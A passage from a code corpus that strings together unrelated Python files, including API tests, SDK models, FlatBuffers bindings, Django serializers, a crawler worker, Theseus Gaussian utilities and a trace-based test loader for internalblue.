def test_list_job_events(self):
"""- list events from the sample playbook run"""
response = self.app.get('api/v1/jobs/53b955f2-b79a-11e8-8be9-c85b7671906d/events') # noqa
self.assertEqual(response.status_code,
200)
payload = json.loads(response.data)
self.assertEqual(payload['data']['total_events'],
49)
def test_list_invalid_job(self):
"""- list events for a playbook run that doesn't exist - error 404"""
response = self.app.get("api/v1/jobs/93b955f2-b79a-11e8-8be9-c85b76719093/events") # noqa
self.assertEqual(response.status_code,
404)
def test_fetch_single_event(self):
"""- fetch a single event by event uuid"""
response = self.app.get("api/v1/jobs/53b955f2-b79a-11e8-8be9-c85b7671906d/events/49-e084d030-cd3d-4c76-a4d3-03d032c4dc8f") # noqa
self.assertEqual(response.status_code,
200)
self.assertEqual(response.headers['Content-Type'],
'application/json')
self.assertIn("event_data", json.loads(response.data)['data'])
def test_fetch_invalid_event(self):
"""- attempt to fetch an invalid event - error 404"""
response = self.app.get("api/v1/jobs/53b955f2-b79a-11e8-8be9-c85b7671906d/events/49-9384d030-cd3d-4c76-a4d3-03d032c4dc93") # noqa
self.assertEqual(response.status_code,
404)
def test_get_event_with_filter(self):
"""- use filter to find matching events in a playbook run"""
response = self.app.get("api/v1/jobs/53b955f2-b79a-11e8-8be9-c85b7671906d/events?task=RESULTS") # noqa
self.assertEqual(response.status_code,
200)
self.assertEqual(response.headers['Content-Type'],
'application/json')
payload = json.loads(response.data)
self.assertIn("events", payload['data'])
self.assertEqual(payload['data']['total_events'],
1)
self.assertEqual(payload['data']['events']['49-e084d030-cd3d-4c76-a4d3-03d032c4dc8f']['task'], # noqa
"RESULTS")
def test_get_event_with_invalid_filter(self):
"""- use filter that doesn't match any event"""
response = self.app.get("api/v1/jobs/53b955f2-b79a-11e8-8be9-c85b7671906d/events?task=MISSING") # noqa
self.assertEqual(response.status_code,
200)
payload = json.loads(response.data)
self.assertIn("events", payload['data'])
self.assertEqual(payload['data']['total_events'],
0)
if __name__ == "__main__":
unittest.main(verbosity=2)
|
Beginner/Mathison and pangrams (MATPAN)/mathison.py | anishsingh42/CodeChef | 127 | 11155770 |
t = int(input())
while t:
N = list(map(int,input().split()))
S = input()
letters = "abcdefghijklmnopqrstuvwxyz"
arr=[]
for i in range(26):
if letters[i] not in S:
arr.append(N[i])
print(sum(arr))
t = t-1 |
tests/docstring/create_param_docstring_test.py | nickgaya/bravado-core | 122 | 11155771 | # -*- coding: utf-8 -*-
import pytest
from bravado_core.docstring import create_param_docstring
def test_param_with_no_default_value(param_spec):
del param_spec['default']
expected = \
":param status: the status, yo! (optional)\n" \
":type status: array\n"
assert expected == create_param_docstring(param_spec)
def test_param_with_default_value(param_spec):
expected = \
":param status: the status, yo! (Default: available) (optional)\n" \
":type status: array\n"
assert expected == create_param_docstring(param_spec)
def test_param_with_no_description(param_spec):
del param_spec['description']
expected = \
":param status: Document your spec, yo! (Default: available) " \
"(optional)\n" \
":type status: array\n"
assert expected == create_param_docstring(param_spec)
def test_param_required_true(param_spec):
param_spec['required'] = True
expected = \
":param status: the status, yo! (Default: available)\n" \
":type status: array\n"
assert expected == create_param_docstring(param_spec)
def test_param_required_false(param_spec):
param_spec['required'] = False
expected = \
":param status: the status, yo! (Default: available) (optional)\n" \
":type status: array\n"
assert expected == create_param_docstring(param_spec)
@pytest.fixture
def param_in_body_spec():
return {
"in": "body",
"name": "body",
"description": "Pet object that needs to be added to the store",
"required": False,
"schema": {
"$ref": "#/definitions/Pet",
},
}
def test_param_in_body(param_in_body_spec):
expected = \
":param body: Pet object that needs to be added to the store " \
"(optional)\n" \
":type body: #/definitions/Pet\n"
assert expected == create_param_docstring(param_in_body_spec)
|
src/tryceratops/fixers/__init__.py | swellander/tryceratops | 269 | 11155789 | from __future__ import annotations
from typing import TYPE_CHECKING, Set, Type
from .base import BaseFixer
from .exception_block import LoggerErrorFixer, RaiseWithoutCauseFixer, VerboseReraiseFixer
if TYPE_CHECKING:
from tryceratops.filters import GlobalSettings
FIXER_CLASSES: Set[Type[BaseFixer]] = {
RaiseWithoutCauseFixer,
VerboseReraiseFixer,
LoggerErrorFixer,
}
def get_fixers_chain(global_settings: GlobalSettings) -> Set[BaseFixer]:
fixers = {
fixercls() for fixercls in FIXER_CLASSES if global_settings.should_run_processor(fixercls)
}
return fixers
|
tests/proofpdf_test.py | NetaP495L/afdko | 732 | 11155803 | import pytest
from runner import main as runner
from differ import main as differ
from test_utils import get_input_path, get_expected_path, get_temp_file_path
def _get_filename_label(file_name):
sep_index = file_name.find('_')
if sep_index == -1:
return ''
return file_name.split('.')[0][sep_index:]
# -----
# Tests
# -----
@pytest.mark.parametrize('font_filename', [
'cidfont.otf',
'font.otf',
'font.ttf',
])
@pytest.mark.parametrize('tool_name', [
'charplot',
'digiplot',
'fontplot',
'fontplot2',
'hintplot',
'waterfallplot',
])
def test_glyphs_2_7(tool_name, font_filename):
if 'cid' in font_filename:
font_format = 'cid'
elif 'ttf' in font_filename:
font_format = 'ttf'
else:
font_format = 'otf'
pdf_filename = f'{tool_name}_{font_format}_glyphs_2-7.pdf'
font_path = get_input_path(font_filename)
save_path = get_temp_file_path()
runner(['-t', tool_name, '-o', 'o', f'_{save_path}', 'g', '_2-7',
'dno', '=pageIncludeTitle', '_0', '-f', font_path, '-a'])
expected_path = get_expected_path(pdf_filename)
assert differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman'])
@pytest.mark.parametrize('font_filename', [
'cidfont_noHints.otf',
'cidfont_noStems.otf',
'cidfont_noZones.otf',
'font_noHints.otf',
'font_noStems.otf',
'font_noZones.otf',
])
@pytest.mark.parametrize('tool_name', [
'hintplot',
'waterfallplot',
])
def test_hinting_data(tool_name, font_filename):
label = _get_filename_label(font_filename)
if 'cid' in font_filename:
font_format = 'cid'
elif 'ttf' in font_filename:
font_format = 'ttf'
else:
font_format = 'otf'
pdf_filename = f'{tool_name}_{font_format}{label}.pdf'
font_path = get_input_path(font_filename)
save_path = get_temp_file_path()
runner(['-t', tool_name, '-o', 'o', f'_{save_path}', 'g', '_2-7',
'dno', '=pageIncludeTitle', '_0', '-f', font_path, '-a'])
expected_path = get_expected_path(pdf_filename)
assert differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman'])
@pytest.mark.parametrize('font_filename, glyphs', [
('cidfont.otf', '_0-5,98-101'),
('font.otf', '_0-2,4,5'),
])
def test_fontplot2_lf_option(font_filename, glyphs):
tool_name = 'fontplot2'
if 'cid' in font_filename:
font_format = 'cid'
else:
font_format = 'otf'
layout_path = get_input_path('CID_layout')
font_path = get_input_path(font_filename)
pdf_filename = f'{tool_name}_{font_format}_lf_option.pdf'
save_path = get_temp_file_path()
runner(['-t', tool_name, '-o', 'o', f'_{save_path}', 'dno',
'g', glyphs, 'lf', f'_{layout_path}',
'=pageIncludeTitle', '_0', '-f', font_path, '-a'])
expected_path = get_expected_path(pdf_filename)
assert differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman'])
def test_fontsetplot():
f1 = 'SourceSansPro-Black.otf'
f2 = 'SourceSansPro-BlackIt.otf'
pdf_filename = "fontsetplot_otf_glyphs_2-7.pdf"
fp1 = get_input_path(f1)
fp2 = get_input_path(f2)
save_path = get_temp_file_path()
runner(['-t', 'fontsetplot', '-o', 'o', f'_{save_path}', 'dno',
'g', '_2-7', '=pageIncludeTitle', '_0', f'_{fp1}', f'_{fp2}'])
expected_path = get_expected_path(pdf_filename)
assert(differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman']))
@pytest.mark.parametrize('filename', ['SourceSansPro-Black',
'SourceSansPro-BlackIt'])
def test_waterfallplot(filename):
font_filename = f'{filename}.otf'
pdf_filename = f'{filename}.pdf'
font_path = get_input_path(font_filename)
save_path = get_temp_file_path()
expected_path = get_expected_path(pdf_filename)
runner(['-t', 'waterfallplot',
'-o', 'o', f'_{save_path}', 'dno', '-f', font_path, '-a'])
assert differ([expected_path, save_path,
'-s', '/CreationDate',
'-r', r'^BT 1 0 0 1 \d{3}\.\d+ 742\.0000 Tm', # timestamp
'-e', 'macroman'])
@pytest.mark.parametrize('tool_name', [
'charplot',
'digiplot',
'fontplot',
'fontplot2',
'hintplot',
'waterfallplot',
])
def test_seac_in_charstring_bug125(tool_name):
pdf_filename = f'bug125_{tool_name}.pdf'
font_path = get_input_path('seac.otf')
save_path = get_temp_file_path()
runner(['-t', tool_name, '-o', 'o', f'_{save_path}', 'dno',
'=pageIncludeTitle', '_0', '-f', font_path, '-a'])
expected_path = get_expected_path(pdf_filename)
assert differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman'])
@pytest.mark.parametrize('font_format', ['otf', 'ttf'])
def test_round_glyph_bounds_values_bug128(font_format):
bug_numb = 'bug128'
pdf_filename = f'{bug_numb}_{font_format}.pdf'
font_path = get_input_path(f'{bug_numb}/font.{font_format}')
save_path = get_temp_file_path()
runner(['-t', 'charplot', '-o', 'o', f'_{save_path}', 'g', '_o',
'dno', '=pageIncludeTitle', '_0', '-f', font_path, '-a'])
expected_path = get_expected_path(pdf_filename)
assert differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman'])
def test_fontsetplot_ttf_with_components_bug1125():
pdf_filename = "bug1125.pdf"
font_path = get_input_path('bug1125.ttf')
save_path = get_temp_file_path()
runner(['-t', 'fontsetplot', '-o', 'o', f'_{save_path}', 'dno',
'=pageIncludeTitle', '_0', f'_{font_path}'])
expected_path = get_expected_path(pdf_filename)
assert(differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman']))
|
rllib/rollout.py | mgelbart/ray | 21,382 | 11155808 |
#!/usr/bin/env python
from ray.rllib import evaluate
from ray.rllib.evaluate import rollout, RolloutSaver, run
from ray.rllib.utils.deprecation import deprecation_warning
deprecation_warning(old="rllib rollout", new="rllib evaluate", error=False)
# For backward compatibility
rollout = rollout
RolloutSaver = RolloutSaver
run = run
if __name__ == "__main__":
evaluate.main()
|
src/oci/log_analytics/models/label_priority.py | Manny27nyc/oci-python-sdk | 249 | 11155828 |
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class LabelPriority(object):
"""
The label priority.
"""
#: A constant which can be used with the priority property of a LabelPriority.
#: This constant has a value of "NONE"
PRIORITY_NONE = "NONE"
#: A constant which can be used with the priority property of a LabelPriority.
#: This constant has a value of "LOW"
PRIORITY_LOW = "LOW"
#: A constant which can be used with the priority property of a LabelPriority.
#: This constant has a value of "MEDIUM"
PRIORITY_MEDIUM = "MEDIUM"
#: A constant which can be used with the priority property of a LabelPriority.
#: This constant has a value of "HIGH"
PRIORITY_HIGH = "HIGH"
def __init__(self, **kwargs):
"""
Initializes a new LabelPriority object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param priority:
The value to assign to the priority property of this LabelPriority.
Allowed values for this property are: "NONE", "LOW", "MEDIUM", "HIGH", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type priority: str
"""
self.swagger_types = {
'priority': 'str'
}
self.attribute_map = {
'priority': 'priority'
}
self._priority = None
@property
def priority(self):
"""
Gets the priority of this LabelPriority.
The label priority. Default value is NONE.
Allowed values for this property are: "NONE", "LOW", "MEDIUM", "HIGH", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The priority of this LabelPriority.
:rtype: str
"""
return self._priority
@priority.setter
def priority(self, priority):
"""
Sets the priority of this LabelPriority.
The label priority. Default value is NONE.
:param priority: The priority of this LabelPriority.
:type: str
"""
allowed_values = ["NONE", "LOW", "MEDIUM", "HIGH"]
if not value_allowed_none_or_none_sentinel(priority, allowed_values):
priority = 'UNKNOWN_ENUM_VALUE'
self._priority = priority
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
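# Minimal usage sketch (not part of the generated model); the keyword mirrors the
# attribute documented above and relies on init_model_state_from_kwargs:
#   lp = LabelPriority(priority=LabelPriority.PRIORITY_HIGH)
#   assert lp.priority == "HIGH"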
|
scripts/kilt/convert_kilt_100w_passage_tsv_to_jsonl.py | keleog/pyserini | 451 | 11155842 | #
# Pyserini: Reproducible IR research with sparse and dense representations
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import argparse
import pickle
import csv
from tqdm import tqdm
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert KILT 100 words passage tsv into a 100-words Passage-level JSONL that can be processed by Pyserini')
parser.add_argument('--input', required=True, help='Path to the kilt_w100_title.tsv file')
parser.add_argument('--mapping', required=True, help='Path to the mapping_KILT_title.p file')
parser.add_argument('--output-dir', required=True, help='Path to the output directory')
parser.add_argument('--concat-title', action="store_true", default=False, help='Concatenate the title into each paragraph')
args = parser.parse_args()
# Map of title -> wikipedia id
KILT_mapping = pickle.load(open(args.mapping, "rb"))
not_found = set()
with open(args.input, 'r') as f, open(os.path.join(args.output_dir, '100w_passage_kilt_knowledgesource.jsonl'), 'w') as outp:
tsv = csv.reader(f, delimiter="\t")
next(tsv) # Get rid of headers
for row in tqdm(tsv, mininterval=10.0, maxinterval=20.0):
i = row[0]
text = row[1]
title = row[2]
if title not in KILT_mapping:
not_found.add(f"{title}#{i}")
continue
wikipedia_id = str(KILT_mapping[title])
doc = {}
doc["id"] = f"{wikipedia_id}#{i}"
doc["wikipedia_title"] = title
doc["wikipedia_id"] = wikipedia_id
doc["contents"] = f"{title}\n{text}" if args.concat_title else text
_ = outp.write(json.dumps(doc))
_ = outp.write('\n')
print(f"Not found: {not_found}")
|
server/data_common/fbs/NetEncoding/Matrix.py | atong01/cellxgene | 403 | 11155874 |
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: NetEncoding
import flatbuffers
class Matrix(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsMatrix(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = Matrix()
x.Init(buf, n + offset)
return x
# Matrix
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# Matrix
def NRows(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint32Flags, o + self._tab.Pos)
return 0
# Matrix
def NCols(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint32Flags, o + self._tab.Pos)
return 0
# Matrix
def Columns(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
x = self._tab.Vector(o)
x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
x = self._tab.Indirect(x)
from .Column import Column
obj = Column()
obj.Init(self._tab.Bytes, x)
return obj
return None
# Matrix
def ColumnsLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
return self._tab.VectorLen(o)
return 0
# Matrix
def ColIndexType(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint8Flags, o + self._tab.Pos)
return 0
# Matrix
def ColIndex(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
from flatbuffers.table import Table
obj = Table(bytearray(), 0)
self._tab.Union(obj, o)
return obj
return None
# Matrix
def RowIndexType(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint8Flags, o + self._tab.Pos)
return 0
# Matrix
def RowIndex(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(16))
if o != 0:
from flatbuffers.table import Table
obj = Table(bytearray(), 0)
self._tab.Union(obj, o)
return obj
return None
def MatrixStart(builder): builder.StartObject(7)
def MatrixAddNRows(builder, nRows): builder.PrependUint32Slot(0, nRows, 0)
def MatrixAddNCols(builder, nCols): builder.PrependUint32Slot(1, nCols, 0)
def MatrixAddColumns(builder, columns): builder.PrependUOffsetTRelativeSlot(2, flatbuffers.number_types.UOffsetTFlags.py_type(columns), 0)
def MatrixStartColumnsVector(builder, numElems): return builder.StartVector(4, numElems, 4)
def MatrixAddColIndexType(builder, colIndexType): builder.PrependUint8Slot(3, colIndexType, 0)
def MatrixAddColIndex(builder, colIndex): builder.PrependUOffsetTRelativeSlot(4, flatbuffers.number_types.UOffsetTFlags.py_type(colIndex), 0)
def MatrixAddRowIndexType(builder, rowIndexType): builder.PrependUint8Slot(5, rowIndexType, 0)
def MatrixAddRowIndex(builder, rowIndex): builder.PrependUOffsetTRelativeSlot(6, flatbuffers.number_types.UOffsetTFlags.py_type(rowIndex), 0)
def MatrixEnd(builder): return builder.EndObject()
|
tars/api/serializers/base.py | js882829/tars | 371 | 11155884 |
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from django.core.validators import ip_address_validators
from django.core.exceptions import ObjectDoesNotExist
from django.utils import timezone
from rest_framework import serializers
from rest_framework.pagination import PaginationSerializer
from rest_framework.serializers import ValidationError
from tars.api.utils import get_paginate_params
class DatetimeTzAwareField(serializers.DateTimeField):
def to_representation(self, value):
value = timezone.localtime(value)
return super(DatetimeTzAwareField, self).to_representation(value)
class PkModelField(serializers.IntegerField):
""" simple field do convertion between a pk and model obj """
def __init__(self, model, **kwargs):
super(PkModelField, self).__init__(**kwargs)
self.model = model
def to_internal_value(self, data):
pk = super(PkModelField, self).to_internal_value(data)
try:
return self.model.objects.get(pk=pk)
except ObjectDoesNotExist as e:
raise serializers.ValidationError(e.message)
def to_representation(self, obj):
return obj.pk
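# Illustrative sketch (not part of the original module): declared on a serializer,
# this field accepts a primary key on input and renders the pk on output; "Group" is
# an assumed model used only for the example.
#   owner = PkModelField(model=Group, required=False)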
class IPv4AddressField(serializers.CharField):
default_error_messages = {
'invalid': 'Enter a valid IPv4 address.',
}
def __init__(self, **kwargs):
super(IPv4AddressField, self).__init__(**kwargs)
validators, _ = ip_address_validators("ipv4", False)
self.validators.extend(validators)
class DynamicFieldsModelSerializer(serializers.ModelSerializer):
created_at = DatetimeTzAwareField(read_only=True)
updated_at = DatetimeTzAwareField(read_only=True)
def __init__(self, *args, **kwargs):
fields = kwargs.pop('fields', None)
ignored_fields = kwargs.pop('ignored_fields',
getattr(self.Meta, 'ignored_fields', []))
self.fields.pop('DataChange_LastTime', None)
self.fields.pop('is_deleted', None)
super(DynamicFieldsModelSerializer, self).__init__(*args, **kwargs)
if fields is not None:
allowed = set(fields)
existing = set(self.fields.keys())
for field_name in existing - allowed:
self.fields.pop(field_name)
if ignored_fields is not None:
for field in ignored_fields:
self.fields.pop(field, None)
class PaginatedListSerializer(serializers.ListSerializer):
def get_page(self):
request = self.context.get('request')
page, page_size = get_paginate_params(request)
paginator = Paginator(self.instance, page_size)
return paginator.page(page)
def get_paginated_data(self, **kwargs):
try:
page = self.get_page()
except (EmptyPage, PageNotAnInteger) as e:
raise ValidationError(e)
else:
try:
pagination_serializer_class = self.child.__class__.\
get_pagination_serializer_class(**kwargs)
except:
pagination_serializer_class = PaginationSerializer
serializer = pagination_serializer_class(page, context=self.context)
return serializer.data
class PaginatedSerializerMixin(object):
_serializer_cache = {}
@classmethod
def get_pagination_serializer_class(cls, fields=None, ignored_fields=None):
class CustomSerializer(cls):
class Meta:
model = getattr(cls.Meta, 'model')
ignored_fields = getattr(cls.Meta, 'ignored_fields', tuple())
klass = cls
if fields is not None:
setattr(CustomSerializer.Meta, 'fields', fields)
klass = CustomSerializer
if ignored_fields is not None:
setattr(CustomSerializer.Meta, 'ignored_fields', ignored_fields)
klass = CustomSerializer
if klass.__name__ in klass._serializer_cache:
return klass._serializer_cache[klass.__name__]
else:
class SerializerClass(PaginationSerializer):
class Meta:
object_serializer_class = klass
if ignored_fields is None:
klass._serializer_cache[klass.__name__] = SerializerClass
return SerializerClass
@classmethod
def many_init(cls, *args, **kwargs):
if issubclass(cls, DynamicFieldsModelSerializer):
fields = kwargs.pop('fields', None)
ignored_fields = kwargs.pop('ignored_fields', None)
kwargs['child'] = cls(fields=fields, ignored_fields=ignored_fields)
else:
kwargs['child'] = cls()
meta = getattr(cls, 'Meta', None)
list_serializer_class = getattr(meta,
'list_serializer_class',
PaginatedListSerializer)
return list_serializer_class(*args, **kwargs)
class LogSerializer(PaginatedSerializerMixin, serializers.Serializer):
@classmethod
def get_pagination_serializer_class(cls):
return PaginationSerializer
|
ch07/SpiderNode/SpiderWork.py | AaronZhengkk/SpiderBook | 990 | 11155920 |
#coding:utf-8
from multiprocessing.managers import BaseManager
from .HtmlDownloader import HtmlDownloader
from .HtmlParser import HtmlParser
class SpiderWork(object):
def __init__(self):
        # Initialize the connection from this worker node to the control node in the distributed process
        # Step 1: use BaseManager to register the method names for fetching the Queues
BaseManager.register('get_task_queue')
BaseManager.register('get_result_queue')
        # Step 2: connect to the server:
server_addr = '127.0.0.1'
print(('Connect to server %s...' % server_addr))
        # Note: the port and authkey must exactly match the settings of the server process:
self.m = BaseManager(address=(server_addr, 8001), authkey='baike'.encode('utf-8'))
        # Connect over the network:
self.m.connect()
        # Step 3: obtain the Queue objects:
self.task = self.m.get_task_queue()
self.result = self.m.get_result_queue()
        # Initialize the HTML downloader and parser
self.downloader = HtmlDownloader()
self.parser = HtmlParser()
print('init finish')
def crawl(self):
while(True):
try:
if not self.task.empty():
url = self.task.get()
if url =='end':
                        print('The control node told the spider nodes to stop working...')
                        # then notify the other nodes to stop working as well
self.result.put({'new_urls':'end','data':'end'})
return
                    print('Spider node is parsing: %s' % url.encode('utf-8'))
content = self.downloader.download(url)
new_urls,data = self.parser.parser(url,content)
self.result.put({"new_urls":new_urls,"data":data})
except EOFError as e:
print("连接工作节点失败")
return
except Exception as e:
print(e)
                print('Crawl failed')
if __name__=="__main__":
spider = SpiderWork()
spider.crawl() |
bin/api_connector_splunk/cloudconnectlib/core/template.py | CyberGRX/api-connector-splunk | 106 | 11155948 | from jinja2 import Template
import re
# This pattern matches a template that contains only a single token,
# e.g. "{{ token1 }}" or "{{ token2 }}"
PATTERN = re.compile(r"^\{\{\s*(\w+)\s*\}\}$")
def compile_template(template):
_origin_template = template
_template = Template(template)
def translate_internal(context):
match = re.match(PATTERN, _origin_template)
if match:
context_var = context.get(match.groups()[0])
return context_var if context_var else ''
return _template.render(context)
return translate_internal
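# Minimal usage sketch (illustrative only; the template strings and context are made up):
#   render = compile_template("{{ name }} works at {{ company }}")
#   render({"name": "Alice", "company": "Acme"})  # -> "Alice works at Acme"
#   single = compile_template("{{ name }}")
#   single({})  # -> "" because a lone token missing from the context renders empty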
|
theseus/optimizer/manifold_gaussian.py | jeffin07/theseus | 236 | 11155951 | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from itertools import count
from typing import List, Optional, Sequence, Tuple
import torch
from theseus.geometry import LieGroup, Manifold
class ManifoldGaussian:
_ids = count(0)
def __init__(
self,
mean: Sequence[Manifold],
precision: Optional[torch.Tensor] = None,
name: Optional[str] = None,
):
self._id = next(ManifoldGaussian._ids)
if name is None:
name = f"{self.__class__.__name__}__{self._id}"
self.name = name
dof = 0
for v in mean:
dof += v.dof()
self._dof = dof
self.mean = mean
if precision is None:
precision = torch.eye(self.dof).to(
dtype=mean[0].dtype, device=mean[0].device
)
precision = precision[None, ...].repeat(mean[0].shape[0], 1, 1)
self.update(mean, precision)
@property
def dof(self) -> int:
return self._dof
@property
def device(self) -> torch.device:
return self.mean[0].device
@property
def dtype(self) -> torch.dtype:
return self.mean[0].dtype
# calls to() on the internal tensors
def to(self, *args, **kwargs):
for var in self.mean:
var = var.to(*args, **kwargs)
self.precision = self.precision.to(*args, **kwargs)
def copy(self, new_name: Optional[str] = None) -> "ManifoldGaussian":
if not new_name:
new_name = f"{self.name}_copy"
mean_copy = [var.copy() for var in self.mean]
precision_copy = self.precision.clone()
return ManifoldGaussian(mean_copy, precision=precision_copy, name=new_name)
def __deepcopy__(self, memo):
if id(self) in memo:
return memo[id(self)]
the_copy = self.copy()
memo[id(self)] = the_copy
return the_copy
def update(
self,
mean: Sequence[Manifold],
precision: torch.Tensor,
):
if len(mean) != len(self.mean):
raise ValueError(
f"Tried to update mean with sequence of different"
f"length to original mean sequence. Given: {len(mean)}. "
f"Expected: {len(self.mean)}"
)
for i in range(len(self.mean)):
self.mean[i].update(mean[i])
expected_shape = torch.Size([mean[0].shape[0], self.dof, self.dof])
if precision.shape != expected_shape:
raise ValueError(
f"Tried to update precision with data "
f"incompatible with original tensor shape. Given: {precision.shape}. "
f"Expected: {expected_shape}"
)
if precision.dtype != self.dtype:
raise ValueError(
f"Tried to update using tensor of dtype: {precision.dtype} but precision "
f"has dtype: {self.dtype}."
)
if precision.device != self.device:
raise ValueError(
f"Tried to update using tensor on device: {precision.dtype} but precision "
f"is on device: {self.device}."
)
if not torch.allclose(precision, precision.transpose(1, 2)):
raise ValueError("Tried to update precision with non-symmetric matrix.")
self.precision = precision
# Projects the gaussian (ManifoldGaussian object) into the tangent plane at
# variable. The gaussian mean is projected using the local function,
# and the precision is approximately transformed using the jacobians of the exp_map.
# Returns the mean and precision of the new Gaussian in the tangent plane if
# return_mean is True; otherwise returns the information vector (eta) and precision.
# See section H, eqn 55 in https://arxiv.org/pdf/1812.01537.pdf for a derivation
# of covariance propagation in manifolds.
def local_gaussian(
variable: LieGroup,
gaussian: ManifoldGaussian,
return_mean: bool = True,
) -> Tuple[torch.Tensor, torch.Tensor]:
# assumes gaussian is over just one Manifold object
if len(gaussian.mean) != 1:
raise ValueError(
"local on ManifoldGaussian should be over just one Manifold object. "
f"Passed gaussian {gaussian.name} is over {len(gaussian.mean)} "
"Manifold objects."
)
# check variable and gaussian are of the same LieGroup class
if gaussian.mean[0].__class__ != variable.__class__:
raise ValueError(
"variable and gaussian mean must be instances of the same class. "
f"variable is of class {variable.__class__} and gaussian mean is "
f"of class {gaussian.mean[0].__class__}."
)
# mean vector in the tangent space at variable
mean_tp = variable.local(gaussian.mean[0])
jac: List[torch.Tensor] = []
variable.exp_map(mean_tp, jacobians=jac)
# precision matrix in the tangent space at variable
lam_tp = torch.bmm(torch.bmm(jac[0].transpose(-1, -2), gaussian.precision), jac[0])
if return_mean:
return mean_tp, lam_tp
else:
eta_tp = torch.matmul(lam_tp, mean_tp.unsqueeze(-1)).squeeze(-1)
return eta_tp, lam_tp
# Computes the ManifoldGaussian that corresponds to the gaussian in the tangent plane
# at variable, parameterised by the mean (mean_tp) and precision (precision_tp).
# The mean is transformed to a LieGroup element by retraction.
# The precision is transformed using the inverse of the exp_map jacobians.
# See section H, eqn 55 in https://arxiv.org/pdf/1812.01537.pdf for a derivation
# of covariance propagation in manifolds.
def retract_gaussian(
variable: LieGroup,
mean_tp: torch.Tensor,
precision_tp: torch.Tensor,
) -> ManifoldGaussian:
mean = variable.retract(mean_tp)
jac: List[torch.Tensor] = []
variable.exp_map(mean_tp, jacobians=jac)
inv_jac = torch.inverse(jac[0])
precision = torch.bmm(torch.bmm(inv_jac.transpose(-1, -2), precision_tp), inv_jac)
return ManifoldGaussian(mean=[mean], precision=precision)
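# Illustrative sketch (not part of the original module), assuming `g` is a
# LieGroup instance of the same type as the mean of a ManifoldGaussian `dist`:
#     mean_tp, lam_tp = local_gaussian(g, dist, return_mean=True)
#     recovered = retract_gaussian(g, mean_tp, lam_tp)
# Near the linearization point `g`, `recovered` approximates `dist`, because
# retract_gaussian applies the inverse of the same exp_map jacobians that
# local_gaussian used to push the precision into the tangent plane.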
|
tests/traces/__init__.py | drewbug/internalblue | 485 | 11155963 | <reponame>drewbug/internalblue
from __future__ import print_function
from __future__ import absolute_import
from tests.traces.testwrapper import trace_test, get_trace_path_cmd_tuple
import unittest
import os
tracedir = os.path.dirname(__file__)
def generate_test_suite_from_traces():
def generate_test_from_file(core, tracefile):
tracepath, cmd = get_trace_path_cmd_tuple(core, tracefile)
def test():
print("Running test %s " % (tracefile[:-6]))
trace_test(core, tracepath, cmd)
# Rename the function to the tracefile name without .trace suffix
test.__name__ = tracefile[:-6]
if cmd:
return test
else:
return unittest.skip("No command specified in trace {}".format(tracepath))(test)
suite = unittest.TestSuite()
for core in os.listdir(tracedir):
if os.path.isdir(os.path.join(tracedir,core)):
core_suite = unittest.TestSuite()
for tracefile in os.listdir(os.path.join(tracedir, core)):
if tracefile.endswith(".trace"):
core_suite.addTest(
unittest.FunctionTestCase(generate_test_from_file(core, tracefile), description=tracefile))
suite.addTest(core_suite)
return suite
# test_all_traces()
def load_tests(loader, standard_tests, n):
"""
    This method is called by test frameworks to supply a test suite instead of the framework collecting tests itself.
    This allows us to automatically generate a proper test for each trace in the subdirectory that has a command specified.
    Those tests are then run by the framework in the usual way, which integrates with IDEs.
    TODO: Document PyCharm setup
"""
trace_suite = generate_test_suite_from_traces()
